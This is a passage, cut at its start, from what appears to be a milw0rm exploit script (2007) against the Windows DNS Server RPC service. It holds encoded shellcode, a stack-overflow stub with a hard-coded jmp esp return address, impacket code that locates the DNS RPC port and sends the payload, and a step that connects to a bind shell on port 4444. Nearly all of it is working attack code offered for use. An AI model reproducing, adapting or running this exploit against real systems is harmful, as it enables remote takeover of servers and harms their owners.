"\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1" shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0" shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe" shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9" shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84" shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56" shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8" shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79" shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6" shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9" # Stub sections taken from metasploit stub = '\xd2\x5f\xab\xdb\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00' stub += '\x70\x00\x00\x00\x00\x00\x00\x00\x1f\x38\x8a\x9f\x12\x05\x00\x00' stub += '\x00\x00\x00\x00\x12\x05\x00\x00' stub += '\\A' * 465 # At the time of overflow ESP points into our buffer which has each char # prepended by a '\' and our shellcode code is about 24+ bytes away from # where EDX points stub += '\\\x80\\\x62\\\xE1\\\x77'#Address of jmp esp from user32.dll # The following B's which in assembly translates to 'inc EDX' increments # about 31 times EDX so that it points into our shellcode stub += '\\B' * 43 # Translates to 'jmp EDX' stub += '\\\xff\\\xe2' stub += '\\A' * 134 stub += '\x00\x00\x00\x00\x76\xcf\x80\xfd\x03\x00\x00\x00\x00\x00\x00\x00' stub += '\x03\x00\x00\x00\x47\x00\x00\x00' stub += shellcode # Code ripped from core security document on impacket # www.coresecurity.com/files/attachments/impacketv0.9.6.0.pdf # Not a neat way to discover a dynamic port :-) def DiscoverDNSport(target): trans = transport.SMBTransport(target, 139, 'epmapper') trans.connect() dce = dcerpc.DCERPC_v5(trans) dce.bind(uuid.uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA','3.0'))) pm = epm.DCERPCEpm(dce) handle = '\x00'*20 while 1: dump = pm.portmap_dump(handle) if not dump.get_entries_num(): break handle = dump.get_handle() entry = dump.get_entry().get_entry() if(uuid.bin_to_string(entry.get_uuid()) == '50ABC2A4-574D-40B3-9D66-EE4FD5FBA076'): port = entry.get_string_binding().split('[')[1][:-1] return int(port) print '[-] Could not locate DNS port; Target might not be running DNS' def ExploitDNS(target, port): trans = transport.TCPTransport(target, port) trans.connect() dce = dcerpc.DCERPC_v5(trans) dce.bind(uuid.uuidtup_to_bin(('50abc2a4-574d-40b3-9d66-ee4fd5fba076','5.0'))) dce.call(0x01, stub) def ConnectRemoteShell(target): connect = "/usr/bin/telnet " + target + " 4444" os.system(connect) if __name__ == '__main__': try: target = sys.argv[1] except IndexError: print 'Usage: %s <target ip address>' % sys.argv[0] sys.exit(-1) print '[+] Locating DNS RPC port' port = DiscoverDNSport(target) print '[+] Located DNS RPC service on TCP port: %d' % port ExploitDNS(target, port) print '[+] Exploit sent. Connecting to shell in 3 seconds' time.sleep(3) ConnectRemoteShell(target) # milw0rm.com [2007-04-15]